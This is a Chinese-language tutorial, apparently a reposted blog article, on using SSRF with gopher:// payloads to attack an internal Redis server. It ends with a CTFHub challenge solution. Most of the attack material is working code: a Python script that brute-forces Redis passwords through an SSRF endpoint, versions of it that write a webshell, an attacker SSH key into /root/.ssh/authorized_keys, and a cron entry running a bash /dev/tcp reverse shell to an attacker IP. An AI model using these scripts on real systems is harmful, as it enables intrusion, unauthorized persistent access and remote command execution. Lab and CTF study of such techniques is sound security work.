本篇內(nèi)容主要講解“如何利用SSRF攻擊內(nèi)網(wǎng)服務(wù)”,感興趣的朋友不妨來(lái)看看。本文介紹的方法操作簡(jiǎn)單快捷,實(shí)用性強(qiáng)。下面就讓小編來(lái)帶大家學(xué)習(xí)“如何利用SSRF攻擊內(nèi)網(wǎng)Redis服務(wù)”吧!
0x01 Redis數(shù)據(jù)庫(kù)
成都創(chuàng)新互聯(lián)公司專(zhuān)業(yè)為企業(yè)提供大觀網(wǎng)站建設(shè)、大觀做網(wǎng)站、大觀網(wǎng)站設(shè)計(jì)、大觀網(wǎng)站制作等企業(yè)網(wǎng)站建設(shè)、網(wǎng)頁(yè)設(shè)計(jì)與制作、大觀企業(yè)網(wǎng)站模板建站服務(wù),10余年大觀做網(wǎng)站經(jīng)驗(yàn),不只是建網(wǎng)站,更提供有價(jià)值的思路和整體網(wǎng)絡(luò)服務(wù)。
REmote DIctionary Server(Redis) 是一個(gè)由Salvatore Sanfilippo寫(xiě)的key-value存儲(chǔ)系統(tǒng)。Redis是一個(gè)開(kāi)源的使用ANSI C語(yǔ)言編寫(xiě)、遵守BSD協(xié)議、支持網(wǎng)絡(luò)、可基于內(nèi)存亦可持久化的日志型、Key-Value數(shù)據(jù)庫(kù),并提供多種語(yǔ)言的API。它通常被稱(chēng)為數(shù)據(jù)結(jié)構(gòu),因?yàn)橹担╲alue)可以是 字符串(String), 哈希(Hash), 列表(list), (sets) 和(sorted sets)等類(lèi)型。
簡(jiǎn)單來(lái)說(shuō)Redis就是一個(gè)以Key-Value形式存儲(chǔ)數(shù)據(jù)的數(shù)據(jù)庫(kù)。
Redis數(shù)據(jù)庫(kù)默認(rèn)端口:63790x02 安裝Redis數(shù)據(jù)庫(kù)
系統(tǒng)版本:Ubuntu 20.04.1 LTS
安裝Redis:
apt-getinstall redis-server
修改Redis配置文件(設(shè)置密碼,監(jiān)聽(tīng)ip等):
vim /etc/redis/redis.conf
配置監(jiān)聽(tīng)ip:
bind 127.0.0.1 ::1#只監(jiān)聽(tīng)本地端口,如果需要遠(yuǎn)程登錄可以在后面加上本機(jī)的ip,同時(shí)遠(yuǎn)程登錄也可能造成未授權(quán)訪問(wèn)。
配置默認(rèn)密碼:
#requirepass foobared#默認(rèn)無(wú)密碼,要設(shè)置密碼可以將前面的#刪除,然后將foobared改為要設(shè)置的密碼。
啟動(dòng)Redis:
/bin/redis-server /etc/redis/redis.conf
或者
0x03 RESP協(xié)議
參考這篇文章:https://www.cnblogs.com/linuxsec/articles/11221756.html
Redis 服務(wù)器與客戶端通過(guò) RESP(REdis Serialization Protocol)協(xié)議通信。
RESP實(shí)際上是一個(gè)支持以下數(shù)據(jù)類(lèi)型的序列化協(xié)議:Simple Strings(簡(jiǎn)單字符串),error(錯(cuò)誤),Integer(整數(shù)),Bulk Strings(多行字符串)和 array(數(shù)組)。
客戶端將命令作為 Bulk Strings 的RESP數(shù)組發(fā)送到Redis服務(wù)器。
服務(wù)器根據(jù)命令實(shí)現(xiàn)回復(fù)一種RESP類(lèi)型。
在RESP中,某些數(shù)據(jù)的類(lèi)型取決于第一個(gè)字節(jié):
對(duì)于Simple Strings,回復(fù)的第一個(gè)字節(jié)是 +
對(duì)于error,回復(fù)的第一個(gè)字節(jié)是 -
對(duì)于Integer,回復(fù)的第一個(gè)字節(jié)是 :
對(duì)于Bulk Strings,回復(fù)的第一個(gè)字節(jié)是 $
對(duì)于array,回復(fù)的第一個(gè)字節(jié)是 *
此外,RESP能夠使用稍后指定的Bulk Strings或Array的特殊變體來(lái)表示Null值。
在RESP中,協(xié)議的不同部分始終以"\r\n"(CRLF)結(jié)束。
我們來(lái)抓取一段客戶端與Redis服務(wù)器的通信數(shù)據(jù)包來(lái)具體分析一下。
在linux中可以使用tcpdump來(lái)捕獲數(shù)據(jù)包:
命令:tcpdump -i lo -s 0 port 6379 -w redis.pcap
參數(shù)說(shuō)明:
-i指定網(wǎng)卡(一般指定eth0,這里抓取本地接口的流量需要指定為lo)
-s抓取數(shù)據(jù)包時(shí)默認(rèn)抓取長(zhǎng)度為68字節(jié)。加上-s 0 后可以抓到完整的數(shù)據(jù)包
port指定抓取的端口
-w保存到文件,后接保存的路徑與文件名
然后我們登錄客戶端,這里我設(shè)置了密碼,所以先認(rèn)證,然后再進(jìn)行set key的操作。# redis-cli -h 127.0.0.1 -p 6379127.0.0.1:6379> auth 123456OK127.0.0.1:6379> set ATL OceanOK127.0.0.1:6379> quit
之后我們將抓到的數(shù)據(jù)包導(dǎo)出,用wireshark打開(kāi),然后追蹤TCP流
結(jié)合我們上面對(duì)RESP協(xié)議的解釋?zhuān)覀儊?lái)逐行分析:最上面4行是客戶端自動(dòng)請(qǐng)求服務(wù)器信息,服務(wù)器提示我們需要認(rèn)證,我們就從我們自己發(fā)送的認(rèn)證信息開(kāi)始分析。*2 #數(shù)組 長(zhǎng)度為2$4 #多行字符串 長(zhǎng)度為4auth #認(rèn)證$6 #多行字符串 長(zhǎng)度為6123456 #密碼123456+OK #服務(wù)器返回 普通字符串 OK,表示成功*3 #數(shù)組 長(zhǎng)度為3$3 #多行字符串 長(zhǎng)度為3set #設(shè)置key$3 #多行字符串 長(zhǎng)度為3ATL #key為ATL$5 #多行字符串 長(zhǎng)度為5Ocean #velue為Ocean+OK #服務(wù)器返回 普通字符串 OK,表示成功
那么我們?cè)O(shè)想一下如果我們直接發(fā)送這樣格式的數(shù)據(jù)包能否直接對(duì)Redis進(jìn)行操作呢,我們來(lái)嘗試一下。我們將客戶端發(fā)送的數(shù)據(jù)包進(jìn)行一次url編碼。*2$4auth$6123456*3$3set$4ATL2$6Ocean2Url編碼后:*2%0D%0A%244%0D%0Aauth%0D%0A%246%0D%0A123456%0D%0A*3%0D%0A%243%0D%0Aset%0D%0A%244%0D%0AATL2%0D%0A%246%0D%0AOcean2%0D%0A(注意將%0A替換為%0D%0A)
然后在本機(jī)利用 curl 和 gopher 協(xié)議發(fā)送給 Redis 服務(wù)器。命令:curl gopher://127.0.0.1:6379/_*2%0D%0A%244%0D%0Aauth%0D%0A%246%0D%0A123456%0D%0A*3%0D%0A%243%0D%0Aset%0D%0A%244%0D%0AATL2%0D%0A%246%0D%0AOcean2%0D%0A
我么可以看到,服務(wù)器給我們返回了兩個(gè)+OK說(shuō)明我們的命令執(zhí)行成功了,我我們?cè)僦苯涌匆幌挛覀冊(cè)O(shè)置key 的值,再次驗(yàn)證一下。
可以看到確實(shí)是我們剛剛設(shè)置的值,再次證明了這樣的方法是行的通的。那么我們不按照RESP協(xié)議的格式發(fā)送,如果直接發(fā)送命令是否可以呢,我們?cè)僭囋嚕?/p>這次我們就不設(shè)置key值了,我們直接獲取key的值:
命令:auth 123456get ATL2URL編碼后:auth%20123456%0D%0Aget%20ATL2%0D%0A發(fā)送請(qǐng)求:curl gopher://127.0.0.1:6379/_auth%20123456%0D%0Aget%20ATL2%0D%0A
我們可以看到成功返回了我們剛剛設(shè)置的key的值,說(shuō)明直接發(fā)送命令的方法也是可行的。
知道了如何讓Redis服務(wù)器執(zhí)行我們的命令,那么接下來(lái)我們就來(lái)看如何攻擊來(lái)達(dá)到 getshell 的目的。0x04 攻擊Redis
攻擊Redis一般有3種思路:在web目錄寫(xiě)webshell、在.ssh目錄寫(xiě)公鑰,我們利用私鑰登錄ssh、利用定時(shí)任務(wù)反彈shell。這三種方法都是利用Redis的備份功能實(shí)現(xiàn)的。
在攻擊Redis時(shí)如果配置中設(shè)置了監(jiān)聽(tīng)本機(jī)ip,比如192.168.x.x,或公網(wǎng)ip那么我們就可以直接遠(yuǎn)程訪問(wèn)6379端口與Redis通信了,但一般都只會(huì)監(jiān)聽(tīng)本地端口,這時(shí)候我們就要利用到SSRF了。方法同樣也很簡(jiǎn)單,只需要在有SSRF漏洞的頁(yè)面將數(shù)據(jù)進(jìn)行兩次URL編碼發(fā)送就可以了,具體方法可以看我之前的文章,這里就不多介紹了。Redis認(rèn)證攻擊:
默認(rèn)Redis是沒(méi)有設(shè)置密碼的,這時(shí)候我們可以直接訪問(wèn),但是如果設(shè)置了密碼,我們就要先對(duì)密碼進(jìn)行暴破,得到了正確的密碼才能夠進(jìn)行進(jìn)一步的攻擊。
我們使用下面這個(gè)python腳本進(jìn)行密碼暴破,在腳本同目錄下放一個(gè)文件名為password.txt的字典然后進(jìn)暴破就可以了。# -*- coding: UTF-8 -*-from urllib.parse import quotefrom urllib.request import Request, urlopenurl = "http://192.168.48.133/ssrf.php?url="gopher = "gopher://127.0.0.1:6379/_"def get_password(): f = open("password.txt", "r") return f.readlines()def encoder_url(cmd): urlencoder = quote(cmd).replace("%0A", "%0D%0A") return urlencoderfor password in get_password(): # 攻擊腳本 cmd = """ auth %s quit """ % password # 二次編碼 encoder = encoder_url(encoder_url(cmd)) # 生成payload payload = url + gopher + encoder print(payload) # 發(fā)起請(qǐng)求 request = Request(payload) response = urlopen(request).read().decode() print("This time password is:" + password) print("Get response is:") print(response) if response.count("+OK") > 1: print("find password : " + password) exit()print("Password not found!")print("Please change the dictionary,and try again.")
這里我們隨便寫(xiě)幾個(gè)密碼來(lái)示范。
可以看到,成功找到了密碼。web目錄寫(xiě)webshell:
首先我們要知道Redis如何寫(xiě)入文件:
Redis 中可以導(dǎo)出當(dāng)前數(shù)據(jù)庫(kù)中的 key 和 value
并且可以通過(guò)命令配置導(dǎo)出路徑和文件名:config set dir /var/www/html//設(shè)置導(dǎo)出路徑config set dbfilename shell.php//設(shè)置導(dǎo)出文件名save //執(zhí)行導(dǎo)出操作
于是我們將隨便一個(gè)key的值設(shè)為一句話木馬,然后配置導(dǎo)出路徑為web目錄,導(dǎo)出文件名為php文件,這樣執(zhí)行導(dǎo)出命令就可以在web目錄下寫(xiě)入webshell了。
我們將上一個(gè)腳本中獲取到密碼后在加上一段寫(xiě)入shell的腳本:# -*- coding: UTF-8 -*-from urllib.parse import quotefrom urllib.request import Request, urlopenurl = "http://192.168.48.133/ssrf.php?url="gopher = "gopher://127.0.0.1:6379/_"def get_password(): f = open("password.txt", "r") return f.readlines() def encoder_url(cmd): urlencoder = quote(cmd).replace("%0A", "%0D%0A") return urlencoder###------暴破密碼,無(wú)密碼可刪除-------###for password in get_password(): # 攻擊腳本 path = "/var/www/html/test" shell = "\\n\\n\\n\\n\\n\\n" filename = "shell.php" cmd = """ auth %s quit """ % password # 二次編碼 encoder = encoder_url(encoder_url(cmd)) # 生成payload payload = url + gopher + encoder # 發(fā)起請(qǐng)求 print(payload) request = Request(payload) response = urlopen(request).read().decode() print("This time password is:" + password) print("Get response is:") print(response) if response.count("+OK") > 1: print("find password : " + password) #####---------------如無(wú)密碼,直接從此開(kāi)始執(zhí)行---------------##### cmd = """ auth %s config set dir %s config set dbfilename %s set test1 "%s" save quit """ % (password, path, filename, shell) # 二次編碼 encoder = encoder_url(encoder_url(cmd)) # 生成payload payload = url + gopher + encoder # 發(fā)起請(qǐng)求 request = Request(payload) print(payload) response = urlopen(request).read().decode() print("response is:" + response) if response.count("+OK") > 5: print("Write success!") exit() else: print("Write failed. Please check and try again") exit() #####---------------如無(wú)密碼,到此處結(jié)束------------------#####print("Password not found!")print("Please change the dictionary,and try again.")
執(zhí)行后成功寫(xiě)入,我們到web目錄下看看我們寫(xiě)入的文件。
可以看到格式比較亂,不過(guò)由于我們?cè)谂c句話木馬前加了幾個(gè)換行符還是能夠清晰的看到我們的一句話木馬。那么我們直接用蟻劍或是菜刀連接看看。
可以看到成功連接到我們的webshell。寫(xiě)入公鑰,利用私鑰登錄SSH:
寫(xiě)入公鑰與寫(xiě)webshell的思路是一樣的,只是改一下寫(xiě)入的路徑、文件名以及寫(xiě)入的內(nèi)容。
不過(guò)需要注意,這種方法需要確保靶機(jī)允許使用密鑰登錄。
開(kāi)啟方法:
需要修改 ssh 配置文件 /etc/ssh/sshd_config#StrictModes yes改為StrictModes no然后重啟sshd即可/bin/systemctl restart sshd.service
我們先直接嘗試ssh登錄靶機(jī)試試:
可以看到直接登錄是需要輸入密碼的。那么我們開(kāi)始攻擊。
我們先在攻擊機(jī)上生成一對(duì)公鑰和私鑰。命令:ssh-keygen -t rsa
一路回車(chē)就可以了,然后我們進(jìn)入家目錄的 /.ssh 目錄下,就可以看到我們生成的公鑰和私鑰了。
公鑰內(nèi)容:sh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJE1ZQmknB9zQ1J/HixzTycZMOcXkdqu7hwGRk316cp0Fj0shkV9BbraBzyxKsJyL8bC2aHIEepGQaEQxGRoQOj2BVEmvOFCOgN76t82bS53TEE6Z4/yD3lhA7ylQBYi1Oh9qNkAfJNTm5XaQiCQBvc0xPrGgEQP1SN0UCklY/H3Y+KSpBClk+eESey68etKf+Sl+9xE/SyQCRkD84FhXwQusxxOUUJ4cj1qJiFNqDwy5zu1mLEVtMF23xnxV/WOA4L7cRCw7fqZK/LDoUJXGviF+zzrt9G9Vtrh78YZtvlVxvLDKu8aATlCVAfjtomM1x8I0Mr3tUJyoJLLBVTkMJ9TFfo0WjsqACxEYXC6v/uCAWHcALNUBm0jg/ykthSHe/JwpenbWS58Oy8KmO5GeuCE/ciQjOfI52Ojhxr0e4d9890x/296iuTa9ewn5QmpHKkr+ma2uhhbGEEPwpMkSTp8fUnoqN9T3M9WOc51r3tNSNox2ouHoHWc61gu4XKos= root@kali
然后我們將上面的腳本進(jìn)行略微的改動(dòng),將寫(xiě)入路徑設(shè)為:/root/.ssh ,寫(xiě)入文件名設(shè)為:authorized_keys,寫(xiě)入的內(nèi)容就是我們生成的公鑰。path= "/root/.ssh" #路徑shell= "\\n\\n\\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDJE1ZQmknB9zQ1J/HixzTycZMOcXkdqu7hwGRk316cp0Fj0shkV9BbraBzyxKsJyL8bC2aHIEepGQaEQxGRoQOj2BVEmvOFCOgN76t82bS53TEE6Z4/yD3lhA7ylQBYi1Oh9qNkAfJNTm5XaQiCQBvc0xPrGgEQP1SN0UCklY/H3Y+KSpBClk+eESey68etKf+Sl+9xE/SyQCRkD84FhXwQusxxOUUJ4cj1qJiFNqDwy5zu1mLEVtMF23xnxV/WOA4L7cRCw7fqZK/LDoUJXGviF+zzrt9G9Vtrh78YZtvlVxvLDKu8aATlCVAfjtomM1x8I0Mr3tUJyoJLLBVTkMJ9TFfo0WjsqACxEYXC6v/uCAWHcALNUBm0jg/ykthSHe/JwpenbWS58Oy8KmO5GeuCE/ciQjOfI52Ojhxr0e4d9890x/296iuTa9ewn5QmpHKkr+ma2uhhbGEEPwpMkSTp8fUnoqN9T3M9WOc51r3tNSNox2ouHoHWc61gu4XKos= root@kali\\n\\n\\n"filename= "authorized_keys" #文件名
只修改以上三行就可以了。然后我們運(yùn)行腳本
寫(xiě)入成功,這時(shí)候我們?cè)賴(lài)L試登錄看看。
可以看到我們成功免密登錄了靶機(jī)。利用定時(shí)任務(wù)反彈shell:
關(guān)于定時(shí)任務(wù)反彈shell需要注意:
只能Centos上使用,Ubuntu上行不通,原因如下:因?yàn)槟J(rèn)redis寫(xiě)文件后是644的權(quán)限,但ubuntu要求執(zhí)行定時(shí)任務(wù)文件/var/spool/cron/crontabs/
由于我的靶機(jī)是Ubuntu系統(tǒng),經(jīng)過(guò)測(cè)試確實(shí)不能反彈shell,所以這里就演示到寫(xiě)入定時(shí)任務(wù),反彈shell就無(wú)法演示了。
這里我們先了解一下linux下通過(guò)輸入輸出流來(lái)反彈shell:命令:/bin/bash -i >& /dev/tcp/[ip]/[端口] 0>&1
/bin/bash -i 表示的是調(diào)用bash命令的交互模式,并將交互模式重定向到 /dev/tcp/[ip]/[端口] 中。這里我們將ip和端口改為我們攻擊機(jī)的地址和監(jiān)聽(tīng)端口。
重定向時(shí)加入一個(gè)描述符 &,表示直接作為數(shù)據(jù)流輸入。不加 & 時(shí),重定向默認(rèn)是輸出到文件里的。
/dev/tcp/ip地址/端口號(hào) 是linux下的特殊文件,表示對(duì)這個(gè)地址端口進(jìn)行tcp連接
這里我們?cè)O(shè)置成攻擊機(jī)監(jiān)聽(tīng)的地址
最后面的 0>&1 。此時(shí)攻擊機(jī)和靶機(jī)已經(jīng)建立好了連接,當(dāng)攻擊機(jī)進(jìn)行輸入時(shí),就是這里的 0(標(biāo)準(zhǔn)輸入)
通過(guò)重定向符,重定向到 1(標(biāo)準(zhǔn)輸出)中,由于是作為 /bin/bash 的標(biāo)準(zhǔn)輸入,所以就執(zhí)行了系統(tǒng)命令了。
我們來(lái)執(zhí)行一下試試:
我們先在攻擊機(jī)上監(jiān)聽(tīng)1234端口:
然后在靶機(jī)上執(zhí)行 /bin/bash -i >& /dev/tcp/192.168.48.129/1234 0>&1
這時(shí)候再看我們的攻擊機(jī):
可以看到成功反彈到了shell,并且可以正常執(zhí)行命令。
接下來(lái)我們嘗試寫(xiě)入定時(shí)任務(wù)。path = "/var/spool/cron/crontabs" #路徑shell = "\\n\\n\\n* * * * * bash -i >& /dev/tcp/192.168.48.129/1234 0>&1\\n\\n\\n"filename = "root" #文件名
同樣修改以上三行,然后執(zhí)行。
可以看到提示我們寫(xiě)入成功,我們?cè)俚桨袡C(jī)目錄下確認(rèn)一下。
可以看到確實(shí)寫(xiě)入成功了,使用crontable命令查看root用戶的定時(shí)任務(wù)也可以看到我們寫(xiě)入的內(nèi)容。
但是由于系統(tǒng)以及權(quán)限的原因沒(méi)辦法執(zhí)行定時(shí)任務(wù),有興趣的朋友可以嘗試在CentOS中嘗試一下。我這邊環(huán)境配置到頭禿就不再試了。0x05 CTFHub-SSRF-Redis協(xié)議
本地環(huán)境都已經(jīng)嘗試過(guò)了我們就在嘗試一下在線的環(huán)境,還是使用CTFHub中技能樹(shù)的環(huán)境。
打開(kāi)環(huán)境后頁(yè)面空白,但是在URL中看到了 ?url= 按照之前做題的情況來(lái)看一看就存在SSRF,那么我們就直接用我們之前的腳本來(lái)打。
利用我們之前寫(xiě)webshell的腳本,只需要修改第五行的url就好。
運(yùn)行后發(fā)現(xiàn),服務(wù)器告訴我們沒(méi)有設(shè)置密碼,那就更簡(jiǎn)單了,修改一下腳本:# -*- coding: UTF-8 -*-from urllib.parse import quotefrom urllib.request import Request, urlopenurl = "http://challenge-b15f0eaddbb74bdf.sandbox.ctfhub.com:10080/?url="gopher = "gopher://127.0.0.1:6379/_"def encoder_url(cmd): urlencoder = quote(cmd).replace("%0A", "%0D%0A") return urlencoderpath = "/var/www/html"shell = "\\n\\n\\n\\n\\n\\n"filename = "shell.php"cmd = """config set dir %sconfig set dbfilename %sset test1 "%s"savequit""" % (path, filename, shell)# 二次編碼encoder = encoder_url(encoder_url(cmd))# 生成payloadpayload = url + gopher + encoder# 發(fā)起請(qǐng)求request = Request(payload)print(payload)response = urlopen(request).read().decode()print("response is:" + response)if response.count("+OK") > 4: print("Write success!") exit()else: print("Write failed. Please check and try again") exit()
再次運(yùn)行
成功寫(xiě)入,然后我們就直接用蟻劍連接一下。
成功拿到flag。